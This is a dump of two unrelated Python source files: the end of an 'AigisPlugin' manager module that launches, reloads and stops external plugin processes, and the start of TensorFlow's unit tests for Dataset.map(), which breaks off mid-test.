exit and captures the stdout/err pipes for logging.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
"""
ALOOP.run_until_complete(ExternalIO._run_external(plugin)) # TODO busted
plugin.log.boot("Running...")
Thread(target=_threaded_async_process_wait, args=(plugin, manager, ALOOP), daemon=True).start()
@staticmethod
def reload(plugin, manager):
"""
Reload an external plugin by setting its reload flag and killing the process.
Realistically, this may not be safe for all plugins. It is up to the user to use it responsibly.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
:raises AttributeError: if the plugin has no external process attached to it
"""
try:
plugin._ext_proc.kill()
except AttributeError as e:
raise AttributeError("Missing external process for plugin %s. A reload request was made when the"
"plugin wasn't active.") from e
@staticmethod
async def _run_external(plugin):
"""
Launch an asyncio subprocess.
:param AigisPlugin plugin: the plugin
"""
plugin._ext_proc = await asyncio.create_subprocess_exec(*plugin.config.LAUNCH,
cwd=plugin.config.ENTRYPOINT)
@staticmethod
def stop(plugin, manager=None):
"""
Stop the plugin in as non-violent a way as possible.
Killing the plugin will automatically cause the manager to bury it, so no need to do so manually.
:param AigisPlugin plugin: the plugin to stop
:param PluginManager manager: unused, but required by parent
"""
_stop(plugin)
def _stop(plugin):
"""
Stop the plugin in as non-violent a way as possible.
Send a SIGTERM and wait for 5 seconds. If process is still running, send SIGKILL.
:param AigisPlugin plugin: the plugin to stop
"""
try:
plugin._ext_proc.terminate()
except ProcessLookupError:
# Process already dead. Probably exited earlier.
return
# Poll the return code instead of awaiting it: _ext_proc is an asyncio subprocess whose wait()
# is a coroutine, and this synchronous function runs outside the event loop, so polling with a
# short sleep is the simplest way to enforce the grace period.
start = time.time()
while plugin._ext_proc.returncode is None and time.time()-start < 5:  # wait up to 5 seconds
time.sleep(0.01)
if plugin._ext_proc.returncode is None:
plugin.log.warning("Plugin taking too long to terminate, killing it.")
plugin._ext_proc.kill()
def _threaded_async_process_wait(plugin, manager, loop):
"""
Launch the Watchdog for this plugin's process.
Can only be called on an external plugin.
:param AigisPlugin plugin: the external plugin to wait for.
:param PluginManager manager: this instance's PluginManager
:param AbstractEventLoop loop: the tmp generated event loop to run the watcher in
"""
loop.run_until_complete(jiii(plugin, manager))
def _prep_core_injector_file(plugin):
"""
Fetch the path to the core injection file of a core plugin.
We need to append the core plugin's ENTRYPOINT to the PYTHONPATH so that the core injection
file can process relative imports independently of where the plugin is locally loaded. Without
this step, imports in those files would have to include "ext.<plugin_name>." in front of every
import...
:param AigisPlugin plugin: the core plugin to load
:returns: the local path to the core plugin injector file
:rtype: str
:raises InvalidPluginTypeError: if no injector file can be found, the plugin must be misconfigured.
"""
core_file = os.path.join(plugin.root, "AIGIS/AIGIS.core")
if not os.path.exists(core_file):
if plugin.type == "core":
raise InvalidPluginTypeError(
"No AIGIS/AIGIS.core file found. Plugin is not configured as a core plugin..."
)
return None
return core_file
class RequirementError(exc_utils.PluginLoadError):
"""
Error for issues in handling plugin requirements.
"""
class MissingSecretFileError(exc_utils.PluginLoadError):
"""
Error to be thrown when a specified secrets file cannot be found.
"""
class InvalidPluginTypeError(exc_utils.PluginLoadError):
"""
Error when plugin config has an unsupported type or is not configured for its type.
"""
class PluginLaunchTimeoutError(exc_utils.PluginLoadError):
"""
Error for when the plugin is taking too long to launch.
"""
|
map_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.map()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from collections import namedtuple
import threading
import time
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.experimental.ops import threading_options
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_concat_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import test
def _test_combinations_with_mode_v1(mode):
def new_map_fn(dataset, *args, **kwargs):
return dataset.map(*args, **kwargs)
def legacy_map_fn(dataset, *args, **kwargs):
return dataset.map_with_legacy_function(*args, **kwargs)
new_map_combinations = combinations.combine(
tf_api_version=1,
mode=mode,
apply_map=combinations.NamedObject("map_fn", new_map_fn))
legacy_map_combinations = combinations.combine(
tf_api_version=1,
mode=mode,
apply_map=combinations.NamedObject("legacy_map_fn", legacy_map_fn))
return new_map_combinations + legacy_map_combinations
def _test_combinations_with_mode_v2(mode):
def new_map_fn(dataset, *args, **kwargs):
return dataset.map(*args, **kwargs)
return combinations.combine(
tf_api_version=2,
mode=mode,
apply_map=combinations.NamedObject("map_fn", new_map_fn))
def _test_combinations_with_mode(mode):
return _test_combinations_with_mode_v1(
mode) + _test_combinations_with_mode_v2(mode)
def _test_combinations():
return _test_combinations_with_mode("eager") + _test_combinations_with_mode(
"graph")
def _short_circuit_test_cases():
cases = [
("Identity", None, lambda x: x),
("Replicate", None, lambda x: (x, x)),
("Swap", (None, None), lambda x, y: (y, x)),
("Project", (None, None), lambda x, y: x)
]
def reduce_fn(x, y):
name, structure, fn = y
return x + combinations.combine(
structure=structure, fn=combinations.NamedObject(name, fn))
return functools.reduce(reduce_fn, cases, [])
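# The reduce above simply concatenates one combinations.combine(...) result
# per case; by analogy, functools.reduce(lambda acc, c: acc + [c[0]], cases, [])
# would collect the case names ["Identity", "Replicate", "Swap", "Project"].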
def _make_coordinated_sloppy_dataset(apply_map, num_elements,
num_parallel_calls):
"""Produces a dataset iterator and events to control the order of elements.
Args:
apply_map: method that applies the `map` transformation
num_elements: the number of input elements
num_parallel_calls: the degree of map parallelism
Returns:
A dataset iterator (represented as `get_next` op) and events that can be
used to control the order of output elements.
"""
# Set up threading events used to sequence when items are produced that
# are subsequently interleaved. These events allow us to deterministically
# simulate slowdowns and force sloppiness.
coordination_events = {i: threading.Event() for i in range(num_elements)}
def map_py_fn(x):
coordination_events[x].wait()
coordination_events[x].clear()
return x * x
def fn(x):
return script_ops.py_func(map_py_fn, [x], x.dtype)
options = dataset_ops.Options()
options.experimental_deterministic = False
dataset = dataset_ops.Dataset.range(num_elements)
dataset = apply_map(dataset, fn, num_parallel_calls).with_options(options)
return dataset, coordination_events
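# Usage sketch: a test can force elements to finish out of order by setting
# the events accordingly, e.g.:
#   coordination_events[1].set()   # releases map_py_fn(1) first
#   coordination_events[0].set()   # then releases map_py_fn(0)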
class Foo(object):
"""Dummy class used for invalid return value tests."""
def __init__(self):
pass
class MapTest(test_base.DatasetTestBase, parameterized.TestCase):
def _map_dataset_factory(self, components, apply_map, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(dataset, _map_fn).repeat(count)
self.assertEqual(
[c.shape[1:] for c in components],
[shape for shape in dataset_ops.get_legacy_output_shapes(dataset)])
return dataset
@combinations.generate(_test_combinations())
def testMapDataset(self, apply_map):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._map_dataset_factory(components, apply_map, count=14))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(_test_combinations_with_mode("graph"))
def testMapDatasetMultiThreaded(self, apply_map):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._map_dataset_factory(components, apply_map, count=18))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _parallel_map_dataset_factory(self, components, apply_map, count,
num_parallel_calls, buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(dataset, _map_fn, num_parallel_calls=num_parallel_calls)
dataset = dataset.prefetch(buffer_size).repeat(count)
self.assertEqual(
[c.shape[1:] for c in components],
[shape for shape in dataset_ops.get_legacy_output_shapes(dataset)])
return dataset
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(num_parallel_calls=1, buffer_size=1) +
combinations.combine(num_parallel_calls=1, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=4) +
combinations.combine(num_parallel_calls=8, buffer_size=8) +
combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDataset(self, apply_map, num_parallel_calls, buffer_size):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._parallel_map_dataset_factory(components, apply_map, 14,
num_parallel_calls, buffer_size))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(
combinations.times(
_test_combinations_with_mode("graph"),
combinations.combine(num_parallel_calls=1, buffer_size=1) +
combinations.combine(num_parallel_calls=1, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=4) +
combinations.combine(num_parallel_calls=8, buffer_size=8) +
combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDatasetMultiThreaded(self, apply_map, num_parallel_calls,
buffer_size):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._parallel_map_dataset_factory(components, apply_map, 18,
num_parallel_calls, buffer_size))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
@combinations.generate(_test_combinations())
def testImplicitDisposeParallelMapDataset(self, apply_map):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._parallel_map_dataset_factory(components, apply_map, 1000,
100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapUnspecifiedOutputSize(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset,
lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapError(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset,
lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testPrefetchError(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset, lambda x: array_ops.check_numerics(x, "message")).prefetch(2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureIterator(self, apply_map):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return apply_map(dataset_ops.Dataset.range(10), _map_fn)
def _build_graph():
if context.executing_eagerly():
captured_iterator = iter(dataset_ops.Dataset.range(10))
else:
captured_iterator = dataset_ops.make_initializable_iterator(
dataset_ops.Dataset.range(10))
ds = _build_ds(captured_iterator)
return captured_iterator, ds
captured_iter, ds = _build_graph()
if not context.executing_eagerly():
self.evaluate(captured_iter.initializer)
get_next = self.getNext(ds, requires_initialization=True)
for i in range(10):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureHashTable(self, apply_map):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
dataset = apply_map(input_sentences,
lambda x: string_ops.string_split([x]).values)
dataset = apply_map(dataset, table.lookup)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(table.initializer)
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/123904513)
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureQueue(self, apply_map):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(-1)
dataset = apply_map(dataset, lambda _: queue.dequeue())
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(enqueue_op)
self.evaluate(close_op)
for element in elements:
self.assertEqual(element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): Possible deadlock in eager mode, debug.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureSameResourceMultipleTimes(self, apply_map):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(-1)
dataset = apply_map(dataset, lambda _: (queue.dequeue(), queue_2.dequeue()))
self.evaluate(enqueue_op)
self.evaluate(close_op)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(100):
self.assertCountEqual([elements[i * 2], elements[i * 2 + 1]],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testSeededStatefulOperatorIsProperlyStateful(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
fn = lambda _: random_ops.random_uniform((), seed=11)
dataset = apply_map(dataset, fn).batch(2)
get_next = self.getNext(dataset, requires_initialization=True)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(self.evaluate(get_next()))
self.assertLen(random_values, 10)
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
get_next = self.getNext(dataset, requires_initialization=True)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(self.evaluate(get_next()))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
@combinations.generate(_test_combinations())
def testStatefulMapKeepsStateAcrossIterators(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
fn = lambda _: random_ops.random_uniform((), seed=11)
dataset = apply_map(dataset, fn).repeat(1000).batch(10)
get_next = self.getNext(dataset)
random_values = self.evaluate(get_next())
# Assert that one of the next 99 batches yielded by the iterator is
# different from the first.
i = 0
while i < 99:
if np.any(random_values != self.evaluate(get_next())):
break
i += 1
self.assertLess(i, 99)
@combinations.generate(_test_combinations())
def testStatefulOperationInShortCircuit(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
def increment_fn(x):
counter_var.assign_add(1)
return x
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, increment_fn)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
@combinations.generate(_test_combinations())
def testMapDict(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: {"foo": x * 2, "bar": x**2})
dataset = apply_map(dataset, lambda d: d["foo"] + d["bar"])
self.assertDatasetProduces(
dataset, expected_output=[i * 2 + i**2 for i in range(10)])
@combinations.generate(_test_combinations())
def testMapNamedtuple(self, apply_map):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(10)
images = apply_map(labels, lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = apply_map(dataset_tuple, example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = apply_map(dataset_tuple, preprocess_tuple)
dataset_namedtuple = apply_map(dataset_namedtuple, preprocess_namedtuple)
next_tuple = self.getNext(dataset_tuple)
next_namedtuple = self.getNext(dataset_namedtuple)
# make sure both datasets contain the same data
for i in range(10):
tuple_, namedtuple_ = self.evaluate([next_tuple(), next_namedtuple()])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(next_namedtuple())
@combinations.generate(_test_combinations())
def testUseStepContainerInMap(self, apply_map):
row = np.arange(6)
dataset = dataset_ops.Dataset.from_tensors(row)
dataset = apply_map(dataset,
lambda elems: map_fn.map_fn(lambda x: x * x, elems))
self.assertDatasetProduces(dataset, expected_output=[row**2])
@combinations.generate(_test_combinations())
def testCaseAndCondInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), defaults_two),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensor_slices(row)
return apply_map(dataset, lambda x: control_map_fn(x, num))
row = np.arange(6)
for num in [2, 3, 4]:
get_next = self.getNext(build_dataset(row, num))
for i in range(6):
self.assertEqual(
(i // 2 if i % 2 else i * 2) if (num == 2 or num == 3) else i * 2,
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseInWhileInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), divide),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensors(row)
return apply_map(
dataset,
lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num), elems))
row = np.arange(6)
for num in [2, 3, 4]:
get_next = self.getNext(build_dataset(row, num))
self.assertAllEqual(
[x // 2 if (num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseAndCondInWhileInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), defaults_two),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
row = np.arange(6)
num = 2
dataset = dataset_ops.Dataset.from_tensors(row)
dataset = apply_map(
dataset,
lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num), elems))
get_next = self.getNext(dataset)
self.assertAllEqual([(x // 2 if x % 2 else x * 2) if
(num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testNestedListMapDataset(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([0, 1, 2]).repeat(10)
dataset = apply_map(dataset, lambda a: ([a[1], a[0] + a[2]], a[1]))
expected_output = [(np.array([1, 2]), 1)] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(
combinations.times(_test_combinations(),
combinations.combine(buffer_size=[1, 2, 3, 4])))
def testPrefetch(self, apply_map, buffer_size):
# We will use this event to test that `_map_py_func()` has been invoked a
# certain number of times (6 times, to be exact) after consuming fewer
# elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
# We can indirectly observe that varying the buffer size has the intended
# effect by observing when `ev` is set (on the 6th invocation of
# `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least one element
# to start the prefetching.
dataset = dataset_ops.Dataset.range(100)
dataset = apply_map(dataset, _map_fn).prefetch(buffer_size)
get_next = self.getNext(dataset)
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, self.evaluate(get_next()))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testReturnList(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, constant_op.constant(37.0)])
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
@combinations.generate(_test_combinations())
def testMultiOutputPyFunc(self, apply_map):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _map_fn)
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
@combinations.generate(_test_combinations())
def testSparse(self, apply_map):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _sparse)
self.assertDatasetProduces(
dataset, expected_output=[_sparse(i) for i in range(10)])
@combinations.generate(_test_combinations())
def testSparseChain(self, apply_map):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _sparse)
dataset = apply_map(dataset, _check)
self.assertDatasetProduces(
dataset,
expected_output=[self.evaluate(_check(_sparse(i))) for i in range(10)])
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInference(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=True)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual((32, 3), dataset.element_spec.shape)
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInferencePartial(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=False)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual([None, 3], dataset.element_spec.shape.as_list())
@combinations.generate(_test_combinations())
def testTensorArray(self, apply_map):
def _tensor_array(i):
i = math_ops.cast(i, dtypes.int32)
return (
tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
.unstack(math_ops.range(i, dtype=dtypes.int32)))
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _tensor_array)
self.assertDatasetProduces(
dataset, expected_output=[list(range(i)) for i in range(10)])
@combinations.generate(_test_combinations())
def testTensorArrayChain(self, apply_map):
def _tensor_array(i):
i = math_ops.cast(i, dtypes.int32)
return (
tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
.unstack(math_ops.range(i, dtype=dtypes.int32)))
def _check(x):
self.assertIsInstance(x, tensor_array_ops.TensorArray)
return x.identity()
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _tensor_array)
dataset = apply_map(dataset, _check)
self.assertDatasetProduces(
dataset,
expected_output=[list(range(i)) for i in range(10)])
@combinations.generate(_test_combinations())
def testRagged(self, apply_map):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
dataset = dataset_ops.Dataset.range(5)
dataset = apply_map(dataset, _ragged)
self.assertDatasetProduces(
dataset,
expected_output=[ragged_factory_ops.constant([[i]]) for i in range(5)])
@combinations.generate(_test_combinations())
def testRaggedChain(self, apply_map):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
def _concat(i):
self.assertTrue(ragged_tensor.is_ragged(i))
return ragged_concat_ops.concat([i, i], 0)
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _ragged)
dataset = apply_map(dataset, _concat)
self.assertDatasetProduces(
dataset,
expected_output=[
self.evaluate(_concat(ragged_factory_ops.constant([[i]])))
for i in range(10)
])
# TODO(b/123904513)
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testParallelMapOutOfRangeError(self, apply_map):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
dataset = dataset_ops.Dataset.range(105)
dataset = apply_map(
dataset,
lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
